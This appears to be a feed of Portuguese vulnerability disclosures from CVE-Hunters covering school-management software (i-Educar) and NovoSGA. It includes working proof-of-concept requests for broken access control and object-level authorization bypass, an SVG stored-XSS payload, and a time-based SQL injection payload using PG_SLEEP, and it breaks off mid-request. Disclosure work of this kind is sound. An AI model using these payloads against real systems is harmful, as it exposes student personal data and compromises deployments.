Controle de Acesso Quebrado foi identificada no endpoint <code>/periodo-lancamento</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /periodo-lancamento</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p><h2 id="cve-2025-11050-controle-de-acesso-quebrado-no-endpoint-periodo-lancamento">CVE-2025-11050: Controle de Acesso Quebrado no Endpoint <code>/periodo-lancamento</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11050" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11050</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/periodo-lancamento</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /periodo-lancamento</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autenticar como um usuário sem privilégios.</li></ul></p> <p><img src="/p/cve-2025-11050/image.png" width="1603" height="673" srcset="/p/cve-2025-11050/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11050/image_hu_7e1e16197ca84d77.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="571px" /></p> <p><img src="/p/cve-2025-11050/image-1.png" width="936" height="436" srcset="/p/cve-2025-11050/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11050/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Enviar a seguinte requisição:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /periodo-lancamento HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low_privileged cookie] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>Podemos observar que temos acesso à página e à função. E esse usuário não deve fazer isso.</li></ul></p> <p><img src="/p/cve-2025-11050/image-2.png" width="967" height="657" srcset="/p/cve-2025-11050/image-2_hu_c45211c19b719ad8.png 480w, /p/cve-2025-11050/image-2_hu_b631283a84602958.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="147" data-flex-basis="353px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11050.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11050.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 27 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-11047/ https://www.cvehunters.com/pt/p/cve-2025-11047/ <h2 id="cve-2025-11047-broken-object-level-authorization-bola-permite-a-enumeração-de-registros-de-alunos-via-moduleapialuno">CVE-2025-11047: Broken Object Level Authorization (BOLA) permite a enumeração de registros de alunos via <code>/module/Api/aluno</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11047" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11047</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint <code>/module/Api/aluno</code> do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.</br></br>Essa falha permite que usuários com poucos privilégios (por exemplo, contas padrão de alunos/responsáveis) recuperem informações de matrícula (<b>matrículas</b>) de alunos fora de seu escopo, expondo Informações de Identificação Pessoal (PII) sem as devidas verificações de autorização.</p><h2 id="cve-2025-11047-broken-object-level-authorization-bola-permite-a-enumeração-de-registros-de-alunos-via-moduleapialuno">CVE-2025-11047: Broken Object Level Authorization (BOLA) permite a enumeração de registros de alunos via <code>/module/Api/aluno</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11047" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11047</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint <code>/module/Api/aluno</code> do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.</br></br>Essa falha permite que usuários com poucos privilégios (por exemplo, contas padrão de alunos/responsáveis) recuperem informações de matrícula (<b>matrículas</b>) de alunos fora de seu escopo, expondo Informações de Identificação Pessoal (PII) sem as devidas verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint vulnerável:</b> <code>GET /module/Api/aluno</code></br></br>O aplicativo não consegue aplicar a <b>autorização em nível de objeto</b> ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.</p> <p style="text-align: justify;"><b>Comportamento esperado:</b><ul><li>Somente funções autorizadas (por exemplo, administradores, coordenadores, professores vinculados à turma) devem ter acesso a esses dados.</li><li>Usuários não autorizados devem receber a mensagem 403 "Proibido" ou uma resposta vazia.</li></ul></p> <p style="text-align: justify;"><b>Comportamento observado:</br></b><ul><li>Qualquer usuário autenticado (mesmo contas com privilégios baixos) pode acessar este endpoint e recuperar informações confidenciais sobre turmas acadêmicas.</li></ul></p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autentique como um usuário sem privilégios (por exemplo, aluno, professor).</li></ul></p> <p><img src="/p/cve-2025-11047/image.png" width="1380" height="528" srcset="/p/cve-2025-11047/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-11047/image_hu_374181a535d27950.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="627px" /></p> <p><img src="/p/cve-2025-11047/image-1.png" width="846" height="616" srcset="/p/cve-2025-11047/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-11047/image-1_hu_5d2f89eaf0785474.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="137" data-flex-basis="329px" /></p> <p style="text-align: justify;"><ul><li>Envie a seguinte requisição:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Api/aluno?&oper=get&resource=matriculas&aluno_id=206 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*; q=0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_aluno_det.php?cod_aluno=206 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[LOW PRIVILEGED COOKIE] </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-11047/image-2.png" width="1345" height="676" srcset="/p/cve-2025-11047/image-2_hu_b56dab6489bf9ba8.png 480w, /p/cve-2025-11047/image-2_hu_146b18df03b3e320.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="198" data-flex-basis="477px" /></p> <p style="text-align: justify;"><ul><li>Pudemos observar que informações sobre classes foram retornadas.</li></ul></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a: <ul> <li>Acesso não autorizado a PII sensíveis;</li> <li>Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);</li> <li>Possível abuso de dados do usuário ou personificação;</li> <li>Enumeração de usuários.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11047.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11047.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 26 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-11048/ https://www.cvehunters.com/pt/p/cve-2025-11048/ <h2 id="cve-2025-11048-controle-de-acesso-quebrado-no-endpoint-consulta-dispensas">CVE-2025-11048: Controle de Acesso Quebrado no Endpoint <code>/consulta-dispensas</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11048" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11048</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/consulta-dispensas</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /consulta-dispensas</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p><h2 id="cve-2025-11048-controle-de-acesso-quebrado-no-endpoint-consulta-dispensas">CVE-2025-11048: Controle de Acesso Quebrado no Endpoint <code>/consulta-dispensas</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11048" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11048</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/consulta-dispensas</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /consulta-dispensas</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autenticar como um usuário sem privilégios.</li></ul></p> <p><img src="/p/cve-2025-11048/image.png" width="1603" height="673" srcset="/p/cve-2025-11048/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11048/image_hu_7e1e16197ca84d77.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="571px" /></p> <p><img src="/p/cve-2025-11048/image-1.png" width="936" height="436" srcset="/p/cve-2025-11048/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11048/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Enviar a seguinte requisição:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /consulta-dispensas HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low_privileged cookie] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>Podemos observar que temos acesso à página e à função. E esse usuário não deve fazer isso.</li></ul></p> <p><img src="/p/cve-2025-11048/image-2.png" width="960" height="816" srcset="/p/cve-2025-11048/image-2_hu_c031b0a968dc8a1c.png 480w, /p/cve-2025-11048/image-2_hu_d30391eb81b5ae23.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="117" data-flex-basis="282px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 26 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10909/ https://www.cvehunters.com/pt/p/cve-2025-10909/ <h2 id="cve-2025-10909-múltiplas-injeções-de-cross-site-scripting-xss-armazenado-por-upload-de-arquivo-svg">CVE-2025-10909: Múltiplas Injeções de Cross-Site Scripting (XSS) armazenado por Upload de Arquivo SVG </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10909" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10909</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p align="justify">Múltiplas vulnerabilidades de Cross-Site Scripting (XSS) armazenado via desvio de upload de arquivo SVG foi identificada no endpoint <code>/admin</code> do aplicativo NovoSGA. Essa vulnerabilidade permite que invasores enviem arquivos maliciosos para os parâmetros <code>logoNavbar</code> e <code>logoLogin</code>. Os arquivos injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada por usuários, representando um risco significativo à segurança.</p><h2 id="cve-2025-10909-múltiplas-injeções-de-cross-site-scripting-xss-armazenado-por-upload-de-arquivo-svg">CVE-2025-10909: Múltiplas Injeções de Cross-Site Scripting (XSS) armazenado por Upload de Arquivo SVG </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10909" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10909</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p align="justify">Múltiplas vulnerabilidades de Cross-Site Scripting (XSS) armazenado via desvio de upload de arquivo SVG foi identificada no endpoint <code>/admin</code> do aplicativo NovoSGA. Essa vulnerabilidade permite que invasores enviem arquivos maliciosos para os parâmetros <code>logoNavbar</code> e <code>logoLogin</code>. Os arquivos injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada por usuários, representando um risco significativo à segurança.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/admin</code></p> <p>Parâmetros: <code>logoNavbar</code>, <code>logoLogin</code></p> <p align="justify">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>logoNavbar</code> e <code>logoLogin</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><p align="justify">Salve o payload no arquivo <code>xss.svg</code>.</p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">svg</span> <span class="na">xmlns</span><span class="o">=</span><span class="s">""</span><span class="na">http:</span><span class="err">//</span><span class="na">www</span><span class="err">.</span><span class="na">w3</span><span class="err">.</span><span class="na">org</span><span class="err">/</span><span class="na">2000</span><span class="err">/</span><span class="na">svg</span><span class="err">""</span> <span class="na">fill</span><span class="o">=</span><span class="s">""</span><span class="na">none</span><span class="err">""</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="nx">alert</span><span class="p">(</span><span class="s2">""</span><span class="nx">This</span> <span class="nx">is</span> <span class="nx">an</span> <span class="nx">XSS</span><span class="o">-</span><span class="nx">POC</span> <span class="nx">from</span> <span class="nx">CVEHUNTERS</span><span class="s2">""</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">svg</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10909/image-1.png" width="547" height="248" srcset="/p/cve-2025-10909/image-1_hu_5e49e8aee02acf5b.png 480w, /p/cve-2025-10909/image-1_hu_26dd0b39f6a28a56.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="220" data-flex-basis="529px" /></p> <p><img src="/p/cve-2025-10909/image.png" width="565" height="262" srcset="/p/cve-2025-10909/image_hu_b57344f147506082.png 480w, /p/cve-2025-10909/image_hu_5d0c054a6a8a9ef0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="215" data-flex-basis="517px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/NovoSGA/CVE-2025-10909.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/NovoSGA/CVE-2025-10909.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 24 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10844/ https://www.cvehunters.com/pt/p/cve-2025-10844/ <h2 id="cve-2025-10844-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-modulecadastroaluno">CVE-2025-10844: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>module/Cadastro/aluno</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10844" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10844</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>module/Cadastro/aluno</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-10844-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-modulecadastroaluno">CVE-2025-10844: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>module/Cadastro/aluno</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10844" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10844</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>module/Cadastro/aluno</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>module/Cadastro/aluno</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">' AND 9581=(SELECT 9581 FROM PG_SLEEP(5)) AND 'bffB'='bffB </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Cadastro/aluno?id=208%27%20AND%209581=(SELECT%209581%20FROM%20PG_SLEEP(5))%20AND%20%27bffB%27=%27bffB HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost:8086 </span></span><span class="line"><span class="cl">sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: pt-BR,pt;q=0.9 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) </span></span><span class="line"><span class="cl">Chrome/138.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: </span></span><span class="line"><span class="cl">text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; </span></span><span class="line"><span 